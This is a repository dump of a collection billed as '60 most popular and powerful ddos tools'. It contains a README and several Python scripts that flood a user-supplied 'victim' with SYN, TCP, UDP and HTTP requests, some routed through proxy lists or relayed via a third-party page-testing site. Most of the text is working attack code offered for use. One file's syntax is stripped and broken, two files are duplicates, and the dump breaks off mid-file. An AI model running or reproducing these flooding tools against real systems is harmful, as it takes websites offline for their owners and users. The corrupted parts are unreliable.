├── ddos.py ├── socks.pyc ├── goldeneye.pyc ├── haidoser.py ├── terminal.pyc ├── Blackhorizon.pyc ├── README.md ├── zero.py ├── hht.py ├── htt.py ├── kimlink.py ├── httpdoser.py ├── doser.py ├── ddos-website.py ├── kithulk.py ├── zx.py ├── doserdoser.py ├── Alexander.py ├── Monteam.py ├── torshammer.py ├── terminal.py ├── kit.py ├── dieproxy2.py ├── v8.py ├── hulkv8.py ├── ddoswebsite.py ├── ddosweb.py ├── Joker.py ├── jcalex.py ├── cloverdoser99.py ├── Sadattack.py ├── socks.py └── hacking.py /ddos.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lucthienphong1120/full-60-ddos-tools/HEAD/ddos.py -------------------------------------------------------------------------------- /socks.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lucthienphong1120/full-60-ddos-tools/HEAD/socks.pyc -------------------------------------------------------------------------------- /goldeneye.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lucthienphong1120/full-60-ddos-tools/HEAD/goldeneye.pyc -------------------------------------------------------------------------------- /haidoser.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lucthienphong1120/full-60-ddos-tools/HEAD/haidoser.py -------------------------------------------------------------------------------- /terminal.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lucthienphong1120/full-60-ddos-tools/HEAD/terminal.pyc -------------------------------------------------------------------------------- /Blackhorizon.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lucthienphong1120/full-60-ddos-tools/HEAD/Blackhorizon.pyc -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Full 60 Ddos Tools 2 | 3 | ## Yoo, It's a collection of 60 most popular and powerful ddos tools now. 4 | 5 | --- 6 | 7 | Most powerful DDOS Tools need Python to run. This is a highly personal and optimized programming language. Widely used, easy to learn and simpler optimized syntax. Also used to write Tool DDOS Python to test server for network security. 8 | 9 | --- 10 | 11 | Use Python to write a program that is capable of denial of service attacks. Causing network congestion and making users unable to use resources on the Website. In other words, the website is completely paralyzed when receiving too many packets sent at the same time. 12 | 13 | --- 14 | 15 | ``` 16 | Note that comply with network security rules when using, 17 | I will not be responsible for any illegal acts you cause !!! 18 | ``` 19 | -------------------------------------------------------------------------------- /zero.py: -------------------------------------------------------------------------------- 1 | #!usrbinpython 2 | #=======================Louis========================# 3 | 4 | import sys 5 | import random 6 | import mechanize 7 | import cookielib 8 | import socket 9 | import httplib 10 | 11 | print '..I AM Cloverdoser..' 12 | print '...XIRUSTEAM... ' 13 | 14 | 15 | 16 | victim = str(raw_input(TARGET)) 17 | print STOPctrl+c 18 | 19 | useragents = [('User-agent', 'Mozilla5.0 (X11; U; Linux i686; en-US; rv1.9.0.1) Gecko2008071615 Fedora3.0.1-1.fc9 Firefox3.0.1')] 20 | 21 | ddos = httpwww.webpagetest.org 22 | 23 | bot = httplouis-ddosvn.rhcloud.comf5.htmlv=%s&n=2000 % victim 24 | 25 | 26 | 27 | 28 | print [+]ATTACKING TARGET %s %victim 29 | br = mechanize.Browser() 30 | br.set_handle_robots(False) 31 | br.addheaders = [('User-agent', random.choice(useragents))] 32 | br.set_handle_equiv(True) 33 | br.set_handle_referer(True) 34 | br.set_handle_redirect(True) 35 | br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) 36 | #ddos 37 | i = 0 38 | d = 0 39 | while d1000000000000000000000000000000000000000000 40 | try 41 | site = br.open(ddos) 42 | br.select_form(name=urlEntry) 43 | br[url] = bot 44 | br.submit() 45 | except KeyboardInterrupt 46 | print Bye 47 | sys.exit(0) -------------------------------------------------------------------------------- /hht.py: -------------------------------------------------------------------------------- 1 | #!usr/bin/python 2 | #ZeroX ddos tool 3 | #version: 1.0 4 | #author:ZeroX 5 | #===============================================# 6 | 7 | import sys 8 | import random 9 | import mechanize 10 | import cookielib 11 | import socket 12 | import httplib 13 | 14 | print "############################" 15 | print "# #" 16 | print "# ZeroX ddos tool #" 17 | print "# #" 18 | print "############################" 19 | print " ######################" 20 | print " # #" 21 | print " # HHT #" 22 | print " # Hades Hacking Team #" 23 | print " # #" 24 | print " ######################" 25 | print "[!]Minh se khong chiu trach nhiem ve nhung viec cac ban gay ra bang tool ddos nay[!]" 26 | 27 | 28 | victim = str(raw_input("Trang web can ddos :")) 29 | print "khi ddos nhan phim ctrl+c de thoat" 30 | 31 | useragents = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] 32 | 33 | ddos = "http://www.webpagetest.org/" 34 | 35 | bot = "https://5e04b3d8d5661372af21bec73be6c2d8d976b535.googledrive.com/host/0B_He0C-7D6LVX3hNdzQxUVBfdm8/botF5.html?v=%s&n=1000" % victim 36 | 37 | 38 | print "[+] Dang bat dau tan cong vao web %s" %victim 39 | br = mechanize.Browser() 40 | br.set_handle_robots(False) 41 | br.addheaders = [('User-agent', random.choice(useragents))] 42 | br.set_handle_equiv(True) 43 | br.set_handle_referer(True) 44 | br.set_handle_redirect(True) 45 | br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) 46 | #ddos 47 | i = 0 48 | d = 0 49 | while d<1000000000000000000000000000000000000000000: 50 | try: 51 | site = br.open(ddos) 52 | br.select_form(name="urlEntry") 53 | br["url"] = bot 54 | br.submit() 55 | except KeyboardInterrupt: 56 | print "Bye" 57 | sys.exit(0) -------------------------------------------------------------------------------- /htt.py: -------------------------------------------------------------------------------- 1 | #!usr/bin/python 2 | #ZeroX ddos tool 3 | #version: 1.0 4 | #author:ZeroX 5 | #===============================================# 6 | 7 | import sys 8 | import random 9 | import mechanize 10 | import cookielib 11 | import socket 12 | import httplib 13 | 14 | print "############################" 15 | print "# #" 16 | print "# ZeroX ddos tool #" 17 | print "# #" 18 | print "############################" 19 | print " ######################" 20 | print " # #" 21 | print " # HHT #" 22 | print " # Hades Hacking Team #" 23 | print " # #" 24 | print " ######################" 25 | print "[!]Minh se khong chiu trach nhiem ve nhung viec cac ban gay ra bang tool ddos nay[!]" 26 | 27 | 28 | victim = str(raw_input("Trang web can ddos :")) 29 | print "khi ddos nhan phim ctrl+c de thoat" 30 | 31 | useragents = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] 32 | 33 | ddos = "http://www.webpagetest.org/" 34 | 35 | bot = "https://5e04b3d8d5661372af21bec73be6c2d8d976b535.googledrive.com/host/0B_He0C-7D6LVX3hNdzQxUVBfdm8/botF5.html?v=%s&n=1000" % victim 36 | 37 | 38 | print "[+] Dang bat dau tan cong vao web %s" %victim 39 | br = mechanize.Browser() 40 | br.set_handle_robots(False) 41 | br.addheaders = [('User-agent', random.choice(useragents))] 42 | br.set_handle_equiv(True) 43 | br.set_handle_referer(True) 44 | br.set_handle_redirect(True) 45 | br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) 46 | #ddos 47 | i = 0 48 | d = 0 49 | while d<1000000000000000000000000000000000000000000: 50 | try: 51 | site = br.open(ddos) 52 | br.select_form(name="urlEntry") 53 | br["url"] = bot 54 | br.submit() 55 | except KeyboardInterrupt: 56 | print "Bye" 57 | sys.exit(0) -------------------------------------------------------------------------------- /kimlink.py: -------------------------------------------------------------------------------- 1 | # -#- coding: cp1258 -#- 2 | # python ddos flooding # 3 | # Version 1.0.0 # 4 | # Coded by KymljnkII and Kit Hulk # 5 | # Facebook : https://www.facebook.com/nhoc.nhi.790# 6 | # File : kymljnkII.py # 7 | # # # # # # # # # # # # # # # # # # # # # # # # # # 8 | " This tool create to fjx Kymljnk mistake ! I hope you can forgive :(( " 9 | #IMPORTS 10 | #coding: utf-8 11 | import random 12 | import socket 13 | import sys 14 | import threading 15 | 16 | #KYMLJNKII SYN FLOOD 17 | class synFlood(threading.Thread): 18 | def __init__(self, ip, port, packets): 19 | self.ip = ip 20 | self.port = port 21 | self.packets = packets 22 | self.syn = socket.socket() 23 | threading.Thread.__init__(self) 24 | def run(self): 25 | for i in range(self.packets): 26 | try: 27 | self.syn.connect((self.ip, self.port)) 28 | except: 29 | pass 30 | 31 | #KYMLJNKII TCP FLOOD 32 | class tcpFlood(threading.Thread): 33 | def __init__(self, ip, port, size, packets): 34 | self.ip = ip 35 | self.port = port 36 | self.size = size 37 | self.packets = packets 38 | self.tcp = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 39 | threading.Thread.__init__(self) 40 | def run(self): 41 | for i in range(self.packets): 42 | try: 43 | bytes = random._urandom(self.size) 44 | socket.connect(self.ip, self.port) 45 | socket.setblocking(0) 46 | socket.sendto(bytes,(self.ip, self.port)) 47 | except: 48 | pass 49 | 50 | #KYMLJNKII UDP FLOOD 51 | class udpFlood(threading.Thread): 52 | def __init__(self, ip, port, size, packets): 53 | self.ip = ip 54 | self.port = port 55 | self.size = size 56 | self.packets = packets 57 | self.udp = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) 58 | threading.Thread.__init__(self) 59 | def run(self): 60 | for i in range(self.packets): 61 | try: 62 | bytes = random._urandom(self.size) 63 | if self.port == 0: 64 | self.port = random.randrange(1, 65535) 65 | self.udp.sendto(bytes,(self.ip, self.port)) 66 | except: 67 | pass 68 | 69 | #Main 70 | print(" .----. KymLjnkII - Con nuoi cua KitHulk - Ver 1.0 .----. ") 71 | print(".-. Chon cac type: syn, tcp, udp, stu. Nhan Ctr-C de Stop Attack -.") 72 | #Input gia tri vao 73 | #Type 74 | type = raw_input("Type: ") 75 | #IP 76 | ip = raw_input("IP: ") 77 | #Port 78 | port = raw_input("Port: ") 79 | #Size 80 | size = '65000' 81 | 82 | if type!='syn': 83 | size=raw_input("Size: ") 84 | #packets 85 | packets = raw_input("Packets: ") 86 | 87 | if type=='syn': 88 | try: 89 | dem = 0 90 | while True: 91 | dem = dem+1 92 | t = synFlood(ip,port,int(packets)) 93 | t.start() 94 | print str(dem)+' - Kymljnk II Attack SYN -->'+ip+':'+port 95 | except: 96 | print 'Stop!' 97 | pass 98 | elif type=='tcp': 99 | try: 100 | dem = 0 101 | while True: 102 | dem = dem+1 103 | t = tcpFlood(ip,port,size,int(packets)) 104 | t.start() 105 | print str(dem)+' - Kymljnk II Attack TCP -->'+ip+':'+port 106 | except: 107 | print 'Stop!' 108 | pass 109 | elif type=='udp': 110 | try: 111 | dem = 0 112 | while True: 113 | dem = dem+1 114 | t = udpFlood(ip,port,size,int(packets)) 115 | t.start() 116 | print str(dem)+' - Kymljnk II Attack UDP -->'+ip+':'+port 117 | except: 118 | print 'Stop!' 119 | pass 120 | elif type=='stu': 121 | try: 122 | dem = 0 123 | while True: 124 | dem = dem+1 125 | syn = synFlood(ip,port,int(packets)) 126 | syn.start() 127 | tcp = tcpFlood(ip,port,size,int(packets)) 128 | tcp.start() 129 | udp = udpFlood(ip,port,size,int(packets)) 130 | udp.start() 131 | print str(dem)+' - Kymljnk II Attack STU -->'+ip+':'+port 132 | except: 133 | print 'Stop!' 134 | pass -------------------------------------------------------------------------------- /httpdoser.py: -------------------------------------------------------------------------------- 1 | import urllib2 2 | import sys 3 | import threading 4 | import random 5 | import re 6 | 7 | #global params 8 | url='' 9 | host='' 10 | headers_useragents=[] 11 | headers_referers=[] 12 | request_counter=0 13 | flag=0 14 | safe=0 15 | 16 | def inc_counter(): 17 | global request_counter 18 | request_counter+=1 19 | 20 | def set_flag(val): 21 | global flag 22 | flag=val 23 | 24 | def set_safe(): 25 | global safe 26 | safe=1 27 | 28 | # generates a user agent array 29 | def useragent_list(): 30 | global headers_useragents 31 | headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3') 32 | headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') 33 | headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') 34 | headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1') 35 | headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1') 36 | headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') 37 | headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') 38 | headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') 39 | headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') 40 | headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') 41 | headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') 42 | headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') 43 | return(headers_useragents) 44 | 45 | # generates a referer array 46 | def referer_list(): 47 | global headers_referers 48 | headers_referers.append('http://www.google.com/?q=') 49 | headers_referers.append('http://www.usatoday.com/search/results?q=') 50 | headers_referers.append('http://engadget.search.aol.com/search?q=') 51 | headers_referers.append('http://' + host + '/') 52 | return(headers_referers) 53 | 54 | #builds random ascii string 55 | def buildblock(size): 56 | out_str = '' 57 | for i in range(0, size): 58 | a = random.randint(65, 90) 59 | out_str += chr(a) 60 | return(out_str) 61 | 62 | def usage(): 63 | print '---------------------------------------------------' 64 | print 'USAGE: python httpdoser.py ' 65 | print 'httpdoser website : KillerRoot' 66 | print "\a" 67 | print \ 68 | """ 69 | ... 70 | ;::::; Http_Doser Starting... 71 | ;::::; :; By KillerRoot 72 | ;:::::' :; 73 | ;:::::; ;. 74 | ,:::::' ; OOO\ 75 | ::::::; ; OOOOO\ 76 | ;:::::; ; OOOOOOOO 77 | ,;::::::; ;' / OOOOOOO 78 | ;:::::::::`. ,,,;. / / DOOOOOO 79 | .';:::::::::::::::::;, / / DOOOO 80 | ,::::::;::::::;;;;::::;, / / DOOO 81 | ;`::::::`'::::::;;;::::: ,#/ / DOOO 82 | :`:::::::`;::::::;;::: ;::# / DOOO 83 | ::`:::::::`;:::::::: ;::::# / DOO 84 | `:`:::::::`;:::::: ;::::::#/ DOO 85 | :::`:::::::`;; ;:::::::::## OO 86 | ::::`:::::::`;::::::::;:::# OO 87 | `:::::`::::::::::::;'`:;::# O 88 | `:::::`::::::::;' / / `:# 89 | ::::::`:::::;' / / `# 90 | 91 | """ 92 | print '---------------------------------------------------' 93 | 94 | 95 | #http request 96 | def httpcall(url): 97 | useragent_list() 98 | referer_list() 99 | code=0 100 | if url.count("?")>0: 101 | param_joiner="&" 102 | else: 103 | param_joiner="?" 104 | request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) 105 | request.add_header('User-Agent', random.choice(headers_useragents)) 106 | request.add_header('Cache-Control', 'no-cache') 107 | request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') 108 | request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) 109 | request.add_header('Keep-Alive', random.randint(110,120)) 110 | request.add_header('Connection', 'keep-alive') 111 | request.add_header('Host',host) 112 | try: 113 | urllib2.urlopen(request) 114 | except urllib2.HTTPError, e: 115 | #print e.code 116 | set_flag(1) 117 | print 'Flooding WebSite Port 80 with 65000-byte packets for 99999' 118 | code=500 119 | except urllib2.URLError, e: 120 | #print e.reason 121 | sys.exit() 122 | else: 123 | inc_counter() 124 | urllib2.urlopen(request) 125 | return(code) 126 | 127 | 128 | #http caller thread 129 | class HTTPThread(threading.Thread): 130 | def run(self): 131 | try: 132 | while flag<2: 133 | code=httpcall(url) 134 | if (code==500) & (safe==1): 135 | set_flag(2) 136 | except Exception, ex: 137 | pass 138 | 139 | # monitors http threads and counts requests 140 | class MonitorThread(threading.Thread): 141 | def run(self): 142 | previous=request_counter 143 | while flag==0: 144 | if (previous+100request_counter): 145 | print "%d Shots sends Senting" % (request_counter) 146 | previous=request_counter 147 | if flag==2: 148 | print "\n -M60 Hits are secced" 149 | 150 | #execute 151 | if len(sys.argv) < 2: 152 | usage() 153 | sys.exit() 154 | else: 155 | if sys.argv[1]=="help": 156 | usage() 157 | sys.exit() 158 | else: 159 | print "Flooding WebSite Port 80 with 65000-byte packets for 99999 By Killer@Root" 160 | if len(sys.argv)== 3: 161 | if sys.argv[2]=="safe": 162 | set_safe() 163 | url = sys.argv[1] 164 | if url.count("/")==2: 165 | url = url + "/" 166 | m = re.search('http\://([^/]*)/?.*', url) 167 | host = m.group(1) 168 | for i in range(500): 169 | t = HTTPThread() 170 | t.start() 171 | t = MonitorThread() 172 | t.start() -------------------------------------------------------------------------------- /doser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding: utf8 3 | 4 | import random 5 | import socket 6 | import threading 7 | import time 8 | userAgents = ["Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", 9 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 10 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", 11 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", 12 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3", 13 | "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", 14 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0", 15 | "Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0", 16 | "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0", 17 | "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3", 18 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0", 19 | "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0", 20 | "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))", 21 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", 22 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)", 23 | "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)", 24 | "Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00", 25 | "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14", 26 | "Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14", 27 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14", 28 | "Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02", 29 | "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00", 30 | "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00", 31 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)", 32 | "HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)", 33 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)", 34 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+", 35 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", 36 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+", 37 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", 38 | "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7", 39 | "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5", 40 | "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25", 41 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2", 42 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10", 43 | "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3", 44 | "Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",] 45 | 46 | 47 | reFerers = [ 48 | "https://www.facebook.com/l.php?u=", 49 | "https://drive.google.com/viewerng/viewer?url=", 50 | 51 | def randomIpList(): 52 | random.seed() 53 | res = "" 54 | for ip in xrange(random.randint(2, 8)): 55 | res = res + randomIp() + ", " 56 | return res[0:len(res) - 2] 57 | 58 | def randomUserAgent(): 59 | return random.choice(userAgents) 60 | 61 | def randomReFerer(): 62 | return random.choice(reFerers) 63 | 64 | class attacco(threading.Thread): 65 | def run(self): 66 | current = x 67 | 68 | if current < len(listaproxy): 69 | proxy = listaproxy[current].split(':') 70 | else: 71 | proxy = random.choice(listaproxy).split(':') 72 | 73 | useragent = "User-Agent: " + randomUserAgent() + "\r\n" 74 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 75 | referer = "Referer: "+ randomReFerer() + url + "?r="+ str(random.randint(1, 3000)) + "\r\n" 76 | httprequest = get_host + useragent + referer + accept + forward + connection + "\r\n" 77 | 78 | while nload: 79 | time.sleep(1) 80 | 81 | while 1: 82 | try: 83 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 84 | a.connect((proxy[0], int(proxy[1]))) 85 | a.send(httprequest) 86 | try: 87 | for i in xrange(3): 88 | a.send(httprequest) 89 | except: 90 | tts = 1 91 | 92 | 93 | except: 94 | proxy = random.choice(listaproxy).split(':') 95 | 96 | 97 | 98 | #Main 99 | print(" .----. Ddos - Warning Team .----. ") 100 | print("»------(.:. Ddos/Dos With Proxy List.:.)------»") 101 | 102 | # Site 103 | url = raw_input("Victim: ") 104 | host_url = url.replace("http://", "").replace("https://", "").split('/')[0] 105 | 106 | #Proxy 107 | in_file = open(raw_input("File proxy: "),"r") 108 | proxyf = in_file.read() 109 | in_file.close() 110 | 111 | listaproxy = proxyf.split('\n') 112 | #So luong 113 | thread = input("So luong (1000): ") 114 | get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n" 115 | accept = "Accept-Encoding: gzip, deflate\r\n" 116 | connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n" 117 | nload = 1 118 | x = 0 119 | 120 | for x in xrange(thread): 121 | attacco().start() 122 | time.sleep(0.003) 123 | print "Dang chuan bi luong Ddos " + str(x) + "!" 124 | print "Dang Bat Dau Tan Cong..." 125 | nload = 0 126 | while not nload: 127 | time.sleep(1) -------------------------------------------------------------------------------- /ddos-website.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding: utf8 3 | 4 | import random 5 | import socket 6 | import threading 7 | import time 8 | 9 | userAgents = ["Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", 10 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 11 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", 12 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", 13 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3", 14 | "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", 15 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0", 16 | "Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0", 17 | "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0", 18 | "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3", 19 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0", 20 | "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0", 21 | "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))", 22 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", 23 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)", 24 | "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)", 25 | "Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00", 26 | "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14", 27 | "Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14", 28 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14", 29 | "Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02", 30 | "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00", 31 | "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00", 32 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)", 33 | "HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)", 34 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)", 35 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+", 36 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", 37 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+", 38 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", 39 | "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7", 40 | "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5", 41 | "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25", 42 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2", 43 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10", 44 | "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like 